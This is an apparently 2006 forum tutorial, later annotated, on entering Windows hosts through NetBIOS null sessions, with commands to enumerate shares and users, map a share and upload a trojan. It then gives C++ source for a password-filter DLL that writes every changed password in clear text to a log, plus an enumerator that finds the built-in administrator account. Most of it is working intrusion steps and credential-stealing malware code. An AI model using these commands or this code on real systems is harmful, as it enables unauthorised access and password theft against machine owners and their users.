Screech — posted August 14, 2006

Hello folks. In this tutorial I want to show you how to get into a Windows host over NetBIOS/SMB. (Everything below is for systems you are authorised to test; on a current Windows version most of it is blocked by default — see the notes along the way.) What you need:

- Windows (for the method explained here)
- Internet access
- a NetBIOS scan of the target range
- the good old DOS console
- a bit of knowledge about DOS, nbtstat.exe and net.exe (see Microsoft TechNet for the descriptions)
- knowledge about trojans/backdoors (how they work)

************************************************************************************

Let's start.

1. Fire up a DOS box.

2. Go to the root (usually c:\) and enter:  nbtstat -A IP
   (IP is the IP address of the remote PC — you get the IPs from your scans. `-A` sends a NetBIOS adapter-status query straight to the host on UDP/137, so that port has to be reachable.)

If the host answers, the result is a table like this:

NetBIOS Remote Machine Name Table
Name             Type     Status
--------------------------------------------
computername    <00>  UNIQUE  Registered
workgroupname   <00>  GROUP   Registered
computername    <20>  UNIQUE  Registered
workgroupname   <1E>  GROUP   Registered
workgroupname   <1D>  UNIQUE  Registered
..__MSBROWSE__. <01>  GROUP   Registered
MAC Address = xx-xx-xx-xx-xx-xx (the x's are hex digits)

The entry that matters for the rest of this tutorial is computername <20>: that suffix is the Server (file-sharing) service, i.e. the host is offering SMB shares over NetBIOS. A host without a <20> entry is not advertising file sharing over NetBIOS (Windows 2000 and later can still serve SMB directly on TCP/445, which nbtstat does not show).

************************************************************************************

You can scan for NetBIOS with X-Scan. Also scan with a port scanner such as SuperScan (available at www.packetstormsecurity.nl). NetBIOS itself lives on UDP/137 (name service), UDP/138 (datagram) and TCP/139 (session); TCP/135 is the DCE/RPC endpoint mapper, not NetBIOS, and SMB is additionally reachable on TCP/445 on Windows 2000 and later.

A typical X-Scan result could look like this:

xxx.xxx.xxx.xxx
Administrator - [built-in account for administering the computer/domain]
  Account type: Administrator
  Password age: 291 Day 10 Hour 28 Minute 34 Sec.
  Bad password count: 0
  Number logons: 9
  Last logon: GMT Wed Aug 14 15:26:38 2002
Guest - [built-in account for guest access to the computer/domain]
  Account type: Guest
  Password age: 0 Day 0 Hour 0 Minute 0 Sec.
  Bad password count: 0
  Number logons: 0

(Account details like these come from anonymous — "null session" — user enumeration and are only returned when the target allows it. Windows XP SP2 / Server 2003 and later restrict anonymous enumeration by default through the RestrictAnonymous / RestrictAnonymousSAM policies, so an empty result here usually means the rest of the walkthrough will stop at "Access is denied".)

************************************************************************************

3. Now enter this in the DOS box (you have to replace the xxx.xxx.xxx.xxx
by the IP address of the target; do not type the `c:\>` part, it is the prompt):

c:\>net view \\xxx.xxx.xxx.xxx

Possible response:

System error 5 has occurred.
Access is denied.

c:\>

Oops — not as easy as we thought. Fine, type:

c:\>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""

(This opens a null session: an anonymous connection to the IPC$ share with an empty user name and an empty password. It only succeeds when the target still permits anonymous connections.)

Response: The command completed successfully.

OK, let's try again:

c:\>net view \\xxx.xxx.xxx.xxx

Response: Shared resources on xxx.xxx.xxx.xxx
* here it lists the shares

Now we know the shared resources. Next, map a drive letter to one of them:

c:\>net use m: \\xxx.xxx.xxx.xxx\folder

(Replace "folder" with the name of a shared folder. This still rides on the anonymous session, so it only works for shares that grant read — and, for the next step, write — access to anonymous users.)

Response: The command completed successfully.

Switch to the new drive:

c:\>m:

Usually there is nothing interesting in a shared folder. And because of that...

4. Now we can upload a trojan that gives us access to the rest of the PC. It is better to write a small trojan that does exactly what you want, because existing trojans are recognised by AV tools. But you can also take an existing one, like BO2K. Upload it:

m:\>copy c:\path_to_the_trojan_here m:\

Note that copying a file onto a share only stores it: nothing in this walkthrough executes it on the remote machine, so "now the trojan is installed" is an overstatement — a separate execution step (and normally more than anonymous rights) is needed. The post's preferred follow-up is to upload a DLL trojan through the first one; the C++ source further down is such a DLL, an LSA password-filter (notification package) that records every password change in clear text. A DLL of that kind is only loaded by LSASS once its name has been added to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages and the machine has been rebooted, which requires administrative rights on the target — write access to a file share gives neither.

5.
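Close the connection to the remote folder again:

c:\>net use m: /DELETE

(The IPC$ null session from step 3 is a separate connection; remove it the same way: `net use \\xxx.xxx.xxx.xxx\ipc$ /DELETE`.)

****************************************************************************************
C++ source, to save time. The forum software stripped every backslash from the
original post; they have been restored below in file paths, `L'\\'` literals, `\n`
escapes and the `\\server\share` strings. You will probably still have to edit it
in several places for your own project (MFC precompiled header, netapi32.lib).
****************************************************************************************

#include <windows.h>
#include <lm.h>       /* NetUseAdd/NetShareEnum/NetUserEnum, USE_INFO_2, UNCLEN, CNLEN; link netapi32.lib */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ---------------------------------------------------------------------------
 * Part 1: LSA password-filter ("notification package") DLL.
 *
 * LSASS calls InitializeChangeNotify() once when it loads the DLL and
 * PasswordChangeNotify() after every successful password change, handing it
 * the account name, its RID and the NEW password in clear text.  This DLL
 * writes all of that to C:\WINNT\temp\pwdchange.tmp.  It is loaded only after
 * its name has been added to the registry value
 *   HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
 * and the machine has been rebooted, i.e. it needs administrator rights on the
 * target first.  Defenders: alert on changes to that value, on unsigned DLLs
 * loaded into lsass.exe (LSA Protection / RunAsPPL refuses them), and on
 * clear-text credential files such as the one written here.
 *
 * NOTE(review): the documented password-filter interface also exports
 * PasswordFilter(); it is absent from this listing — confirm whether LSA
 * loads the DLL without it.
 * ------------------------------------------------------------------------- */

/*
 * Minimal stand-in for UNICODE_STRING as LSA passes it: `len` and `maxlen`
 * count BYTES, not characters, and `buff` is NOT NUL-terminated.
 */
struct UNI_STRING {
    USHORT len;
    USHORT maxlen;
    WCHAR *buff;
};

/* Log-file handle: INVALID_HANDLE_VALUE until InitializeChangeNotify() runs, or if CreateFile failed. */
static HANDLE fh = INVALID_HANDLE_VALUE;

/* Append `n` bytes of `s` to the log; does nothing if the file could not be opened. */
static void log_write(const char *s, DWORD n)
{
    DWORD wrote = 0;
    if (fh != INVALID_HANDLE_VALUE)
        WriteFile(fh, s, n, &wrote, 0);
}

/*
 * Copy a counted UTF-16 string into a NUL-terminated ANSI buffer of out_len bytes.
 *
 * Bounded at both ends: the original memcpy'd user->len bytes into a 200-WCHAR
 * stack array, so a long name or password would have smashed the stack inside
 * LSASS; and wcstombs() does not write a terminator when it hits its limit, so
 * the terminator is written explicitly.  Over-long input is truncated.
 */
static void uni_to_ansi(const struct UNI_STRING *s, char *out, size_t out_len)
{
    WCHAR wbuf[200];
    const size_t max_chars = sizeof(wbuf) / sizeof(wbuf[0]) - 1;
    size_t nchars;

    if (out_len == 0)
        return;
    out[0] = '\0';
    if (s == NULL || s->buff == NULL)
        return;

    nchars = s->len / sizeof(WCHAR);
    if (nchars > max_chars)
        nchars = max_chars;                 /* truncate rather than overflow */
    memcpy(wbuf, s->buff, nchars * sizeof(WCHAR));
    wbuf[nchars] = 0;

    if (wcstombs(out, wbuf, out_len - 1) == (size_t)-1)
        out[0] = '\0';                      /* unconvertible character: log nothing rather than garbage */
    out[out_len - 1] = '\0';
}

/* Called by LSA when the DLL is loaded: opens the clear-text log.  Always reports success. */
BOOLEAN __stdcall InitializeChangeNotify(void)
{
    static const char banner[] = "InitializeChangeNotify gestarted\n";

    /* No explicit DACL (lpSecurityAttributes == 0): the file gets the temp
       directory's default permissions and is opened shared for read and write. */
    fh = CreateFile("C:\\WINNT\\temp\\pwdchange.tmp", GENERIC_WRITE,
                    FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
                    FILE_ATTRIBUTE_NORMAL | FILE_FLAG_WRITE_THROUGH, 0);
    /* sizeof - 1 instead of the hard-coded 31 of the original, which cut the 33-byte line short. */
    log_write(banner, (DWORD)(sizeof(banner) - 1));
    return TRUE;
}

/*
 * Called by LSA after every successful password change.
 *
 * user    account name (counted, not NUL-terminated)
 * rid     the account's relative ID (500 is the built-in Administrator)
 * passwd  the NEW password in clear text
 * Returns 0 (STATUS_SUCCESS).
 */
LONG __stdcall PasswordChangeNotify(struct UNI_STRING *user, ULONG rid,
                                    struct UNI_STRING *passwd)
{
    char user_a[200];
    char pass_a[200];
    char line[512];
    int n;

    uni_to_ansi(user, user_a, sizeof(user_a));
    uni_to_ansi(passwd, pass_a, sizeof(pass_a));

    /* Same three fields and format as the original's three WriteFile calls, as one bounded write. */
    n = snprintf(line, sizeof(line), "User = %s : p4sswd = %s : RID = %x\n",
                 user_a, pass_a, (unsigned)rid);
    if (n > 0) {
        if ((size_t)n >= sizeof(line))
            n = (int)sizeof(line) - 1;      /* cannot happen with 199-byte fields, but keep the write bounded */
        log_write(line, (DWORD)n);
    }
    return 0L;
}

/* ---------------------------------------------------------------------------
 * Part 2: null-session share/user enumerator (MFC).  CNTOHunterDlg, CString,
 * the m_Victims tree control and the GotAdmin flag come from the rest of the
 * project and are not part of this listing.
 * ------------------------------------------------------------------------- */

void DoNetUserEnum(const wchar_t *pServer, CNTOHunterDlg *pDlg, HTREEITEM userRoot, HTREEITEM adminRoot);

/*
 * Write "\\<server><suffix>" into out (outChars WCHARs).  server may already
 * carry the leading "\\".  Fails with ERROR_INVALID_COMPUTERNAME when the bare
 * name is empty, longer than CNLEN, or would not fit.
 *
 * Shared by EstablishNullSession() and DoNetUserEnum(); the original repeated
 * the prefix logic in both (and in DoNetUserEnum used variables it never declared).
 */
static BOOL BuildUncPath(const WCHAR *server, const WCHAR *suffix,
                         WCHAR *out, size_t outChars)
{
    size_t nameLen;

    if (server == NULL || *server == L'\0') {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }
    if (server[0] == L'\\' && server[1] == L'\\')
        server += 2;                        /* caller already prefixed it */

    nameLen = (size_t)lstrlenW(server);
    if (nameLen == 0 || nameLen > CNLEN ||
        2 + nameLen + (size_t)lstrlenW(suffix) + 1 > outChars) {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }
    out[0] = L'\\';
    out[1] = L'\\';
    out[2] = L'\0';
    lstrcatW(out, server);
    lstrcatW(out, suffix);
    return TRUE;
}

/* Bounded UTF-16 -> ANSI copy into dst (dstBytes bytes); empty string on NULL input or failure. */
static void WideToAnsi(const WCHAR *src, char *dst, int dstBytes)
{
    if (dstBytes <= 0)
        return;
    if (src == NULL ||
        WideCharToMultiByte(CP_ACP, 0, src, -1, dst, dstBytes, NULL, NULL) == 0)
        dst[0] = '\0';
    dst[dstBytes - 1] = '\0';
}

/*
 * Open an anonymous ("null") IPC$ session to TargetHost, enumerate its shares
 * and accounts into pDlg->m_Victims, then drop the session again.
 *
 * TargetHost  host name or dotted IP, with or without a leading "\\".
 * pDlg        dialog whose m_Victims tree receives the results.
 * Returns TRUE when the null session was established (the enumerations may
 * still have come back empty), FALSE otherwise with GetLastError() set.
 *
 * NOTE(review): the original returned FALSE unconditionally, carried on after
 * a failed NetUseAdd() with an uninitialised machineRoot, skipped creating the
 * category nodes when the host had no shares (so DoNetUserEnum() got garbage
 * parents), looped over dwTotalEntries instead of dwEntriesRead, and never
 * freed the NetShareEnum() buffer.  All of that is fixed here.
 */
BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg *pDlg)
{
    WCHAR wszServ[256];
    WCHAR RemoteResource[UNCLEN + 5 + 1];   /* "\\" + name + "\IPC$" + NUL */
    USE_INFO_2 ui2;
    SHARE_INFO_1 *pSHInfo1 = NULL;
    DWORD dwEntriesRead = 0;
    DWORD dwTotalEntries = 0;
    NET_API_STATUS nas;
    HTREEITEM machineRoot, shareRoot, userRoot, adminRoot;

    /* ANSI CString -> UTF-16: the Net* APIs are Unicode-only. */
    {
        char *pTemp = TargetHost.GetBuffer(256);
        int converted = MultiByteToWideChar(CP_ACP, 0, pTemp, (int)strlen(pTemp) + 1,
                                            wszServ, sizeof(wszServ) / sizeof(wszServ[0]));
        TargetHost.ReleaseBuffer();
        if (converted == 0) {
            SetLastError(ERROR_INVALID_COMPUTERNAME);
            return FALSE;
        }
    }

    if (!BuildUncPath(wszServ, L"\\IPC$", RemoteResource,
                      sizeof(RemoteResource) / sizeof(RemoteResource[0])))
        return FALSE;                       /* last error already set */

    /* Empty user name, password and domain: that is the null session. */
    ZeroMemory(&ui2, sizeof(ui2));
    ui2.ui2_local      = NULL;
    ui2.ui2_remote     = (LPWSTR)RemoteResource;
    ui2.ui2_asg_type   = USE_IPC;
    ui2.ui2_password   = (LPWSTR)L"";
    ui2.ui2_username   = (LPWSTR)L"";
    ui2.ui2_domainname = (LPWSTR)L"";

    nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
    if (nas != NERR_Success) {
        /* Typically access denied when the host restricts anonymous access,
           or a transport error when it is unreachable. */
        SetLastError(nas);
        return FALSE;
    }

    machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT);
    /* Category nodes are created unconditionally so DoNetUserEnum() always
       gets valid parents, even for a host that exposes no shares. */
    shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot, TVI_LAST);
    userRoot  = pDlg->m_Victims.InsertItem("Users",  machineRoot, TVI_LAST);
    adminRoot = pDlg->m_Victims.InsertItem("Admin",  machineRoot, TVI_LAST);

    nas = NetShareEnum(wszServ, 1, (LPBYTE *)&pSHInfo1, MAX_PREFERRED_LENGTH,
                       &dwEntriesRead, &dwTotalEntries, NULL);
    if (nas == NERR_Success && pSHInfo1 != NULL) {
        /* Walk a copy of the pointer so the buffer can still be freed, and
           over dwEntriesRead — the count actually present in the buffer. */
        SHARE_INFO_1 *p = pSHInfo1;
        for (DWORD x = 0; x < dwEntriesRead; ++x, ++p) {
            char sharename[256];
            char remark[256];
            WideToAnsi(p->shi1_netname, sharename, sizeof(sharename));
            WideToAnsi(p->shi1_remark,  remark,    sizeof(remark));
            CString ShareDetails = sharename;
            ShareDetails = ShareDetails + " - " + remark;
            pDlg->m_Victims.InsertItem(ShareDetails, shareRoot, TVI_LAST);
        }
        NetApiBufferFree(pSHInfo1);
    }

    DoNetUserEnum(wszServ, pDlg, userRoot, adminRoot);

    /* Tear the anonymous connection down again; its status is left in GetLastError() as before. */
    nas = NetUseDel(NULL, (LPWSTR)RemoteResource, 0);
    SetLastError(nas);
    return TRUE;
}

/*
 * Resolve pUser on pServer and report whether it is the built-in
 * Administrator, i.e. the account whose SID ends in RID 500.  This identifies
 * the real admin account even when it has been renamed.
 *
 * pServer  server to ask (ANSI, "\\"-prefixed or bare)
 * pUser    account name (ANSI)
 * Name     receives "Admin is DOMAIN\user" when found; untouched otherwise
 * Returns true only for RID 500.
 *
 * NOTE(review): the original used an undeclared szDomainName (a global in the
 * project, presumably), re-used a possibly enlarged domain-name length for a
 * fixed 256-byte buffer, dereferenced a NULL SID when the lookup failed, and
 * freed malloc'd memory with delete.  All fixed here with a local buffer.
 */
bool GetAdmin(char *pServer, char *pUser, CString &Name)
{
    char szDomainName[256];
    DWORD dwDomainName = sizeof(szDomainName);
    DWORD dwSize = 0;
    SID_NAME_USE use;
    PSID pUserSID = NULL;
    bool bFoundHim = false;

    /* First call only sizes the SID; it also overwrites dwDomainName with the
       required length, which must still fit the fixed buffer for call two. */
    if (!LookupAccountName(pServer, pUser, NULL, &dwSize, szDomainName, &dwDomainName, &use) &&
        GetLastError() == ERROR_INSUFFICIENT_BUFFER &&
        dwDomainName <= sizeof(szDomainName)) {
        pUserSID = (PSID)malloc(dwSize);
        if (pUserSID != NULL &&
            LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use) &&
            IsValidSid(pUserSID)) {
            UCHAR iSubCount = *GetSidSubAuthorityCount(pUserSID);
            /* The last sub-authority is the RID; DOMAIN_USER_RID_ADMIN == 500. */
            if (iSubCount > 0 &&
                *GetSidSubAuthority(pUserSID, iSubCount - 1) == DOMAIN_USER_RID_ADMIN) {
                Name.Format("Admin is %s\\%s", szDomainName, pUser);
                bFoundHim = true;
            }
        }
    }
    free(pUserSID);                          /* free(NULL) is a no-op */
    return bFoundHim;
}

/*
 * Enumerate the accounts on pServer through the already-open null session,
 * adding each to userRoot.  The first account that resolves to RID 500 is
 * also added under adminRoot and recorded in the GotAdmin flag.
 *
 * pServer  bare or "\\"-prefixed server name (UTF-16)
 * pDlg     dialog owning the m_Victims tree
 * userRoot / adminRoot  parent nodes for the results (must be valid)
 *
 * NOTE(review): GotAdmin is not declared in this listing (a global or dialog
 * member in the original project); it is used here unchanged.
 */
void DoNetUserEnum(const wchar_t *pServer, CNTOHunterDlg *pDlg, HTREEITEM userRoot, HTREEITEM adminRoot)
{
    WCHAR RemoteResource[UNCLEN + 1];       /* "\\" + name + NUL */
    char userName[256];
    char userServer[256];
    DWORD dwResume = 0;
    DWORD dwRC;

    if (!BuildUncPath(pServer, L"", RemoteResource,
                      sizeof(RemoteResource) / sizeof(RemoteResource[0])))
        return;
    /* Hoisted out of the loop: the server name does not change per account. */
    WideToAnsi(pServer, userServer, sizeof(userServer));

    do {
        USER_INFO_10 *pUserbuf = NULL;
        USER_INFO_10 *pCurUser;
        DWORD dwRead = 0;
        DWORD dwRemaining = 0;

        /* Small prefmaxlen, so the ERROR_MORE_DATA / resume-handle loop is exercised on real hosts. */
        dwRC = NetUserEnum(RemoteResource, 10, 0, (LPBYTE *)&pUserbuf, 1024,
                           &dwRead, &dwRemaining, &dwResume);
        if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)
            break;

        pCurUser = pUserbuf;
        for (DWORD i = 0; pCurUser != NULL && i < dwRead; ++i, ++pCurUser) {
            WideToAnsi(pCurUser->usri10_name, userName, sizeof(userName));

            if (!GotAdmin) {
                CString Admin;
                GotAdmin = GetAdmin(userServer, userName, Admin);
                if (GotAdmin) {              /* original: "if(GotAdmin{" — the ')' was missing */
                    Admin.TrimRight();
                    HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);
                    pDlg->m_Victims.EnsureVisible(adminChild);
                }
            }

            CString strUserName = userName;
            pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);
        }

        if (pUserbuf != NULL)
            NetApiBufferFree(pUserbuf);
    } while (dwRC == ERROR_MORE_DATA);

    if (dwRC != ERROR_SUCCESS)
        printf("NUE() returned %lu", dwRC);  /* kept from the original; a GUI app has no console to show it */
}

***************************************************************************************

Some NetBIOS enumeration tools:

DumpSec   http://www.somarsoft.com           Windows NT/2000
Legion    http://www.technotronic.com        Windows 9x/NT/2000, UNIX/Linux
NAT       http://www.packetstormsecurity.nl  Windows 9x/NT, UNIX/Linux

***************************************************************************************

Congratulations — that is the whole walkthrough. (The original post closes by saying you can "now connect with FTP"; nothing above installs or enables an FTP service on the target, so treat that line as an aside.)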